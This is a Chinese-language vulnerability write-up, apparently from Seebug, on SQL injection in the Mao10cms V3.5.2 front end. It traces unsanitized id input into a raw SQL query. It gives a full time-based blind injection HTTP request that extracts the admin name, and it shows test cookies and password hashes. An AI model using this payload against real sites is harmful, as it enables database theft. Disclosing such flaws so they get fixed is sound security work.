Mao10cms最新版前台注入(有条件限制)

### 简要描述： Mao10cms最新版前台注入 ### 详细说明： Mao10cms用户量不小，2015-06-25更新的V3.5.2，今天来学习一下吧 这个注入问题出现在模板文件中，有多个地方引用这个模板，这里说3个漏洞，是这个问题文件中存在多个注入点引用这个出问题的文件。 问题文件在/theme/default/article/single.php,看代码 ``` <?php mc_template_part('header'); ?> <?php foreach($page as $val) : ?> <div id="single-head-img" class="pr hidden-xs"> <div class="single-head-img shi1" style="background-image: url(<?php if(mc_fmimg($_GET['id'])) : echo mc_fmimg($_GET['id']); else : echo mc_theme_url().'/img/user_bg.jpg'; endif; ?>);"></div> <div class="single-head-img shi2"></div> <div class="single-head-img shi3"> <h1><?php echo mc_user_display_name($_GET['id']); ?></h1> <h4><?php echo mc_cut_str(strip_tags(mc_magic_out(mc_get_page_field($_GET['id'],'content'))), 80); ?></h4> </div> </div> <div class="container"> <div class="row"> <div class="col-sm-12 col-md-10 col-md-offset-1 col-lg-8 col-lg-offset-2"> <ul class="list-inline mb-0 article-brd"> <li> <a href="<?php echo U('article/index/term?id='.mc_get_meta($val['id'],'term')); ?>"> <i class="glyphicon glyphicon-th-list"></i> <?php echo mc_get_page_field(mc_get_meta($val['id'],'term'),'title'); ?> </a> </li> <li class="pull-right hidden-xs"> <i class="glyphicon glyphicon-time"></i> <?php echo date('m/d H:i',$val['date']); ?> </li> <li class="pull-right hidden-xs"> <i class="glyphicon glyphicon-eye-open"></i> <?php echo mc_views_count($val['id']); ?> </li> </ul> 无关代码 ``` 看到文件中多次引用了mc_fmimg($_GET['id'])，去看看 ``` //调用page封面图片 function mc_fmimg($id) { if(mc_get_meta($id,'fmimg')) { return mc_get_meta($id,'fmimg'); } elseif(mc_catch_that_image($id)) { return mc_catch_that_image($id); } else { return mc_option('fmimg'); } }; ``` $_GET['id']进入了mc_get_meta，再去看看 ``` //调用meta function mc_get_meta($page_id,$meta_key,$array=true,$type='basic') { $meta = M('meta')->where("page_id='$page_id' AND meta_key='$meta_key' AND type ='$type'")->order('id desc'); if($array) { return $meta->getField('meta_value'); } else { return $meta->getField('meta_value',true); }; } ``` 没有经过处理，可以SQL注入出任意数据 这里就找个调用该文件的url进行测试，修复时请自行查找调用该文件的地方 下面以time-based blind注入进行证明 Payload(POST提交): ``` POST /index.php?m=article&c=index&a=single&id=123')union/**/select/**/if(mid((select/**/admin_name/**/from/**/pe_admin/**/limit/**/0,1),1,1)='zs',sleep(1),0)%23 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/index.php?m=article&c=index&a=single&id=5 Cookie: 2ev28n3dapp_admininfo=864cM2QjN%2BbkWmbIFVhnPZd5%2BrpdMp4xWzFseC%2Fbe4EBpDKafUGLY7WrakVbYuL46Bbsct6okOjqwOYiELEqJ6C9LBHCiz3RB7VTZ7XN6mwhnpI; bdshare_firstime=1430664757834; CNZZDATA1253530733=1001420044-1432556580-%7C1432556580; PHPSESSID=48jqli3eaqpfkl6i57p51pprn6; user_name=pigtest; user_pass=d0b942fd21ac7b9253a6175179ea7df9 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 4 id=5 ``` 当猜测错误时，如下图 [<img src="https://images.seebug.org/upload/201507/07005241289d66ac6e24f95ff143265f6356558f.jpg" alt="错误副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/07005241289d66ac6e24f95ff143265f6356558f.jpg) 当猜测正确时，如下图 [<img src="https://images.seebug.org/upload/201507/070052543e74062baffd3803af7e282af16bccec.jpg" alt="成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/070052543e74062baffd3803af7e282af16bccec.jpg) 整个注入过程可以使用burpsuite 或者sqlmap 再或者自己写个脚本来跑，在本地进行测试，用户名为admin，密码为f6fdffe48c908deb0f4c3bd36c032e72 ### 漏洞证明： 见 详细说明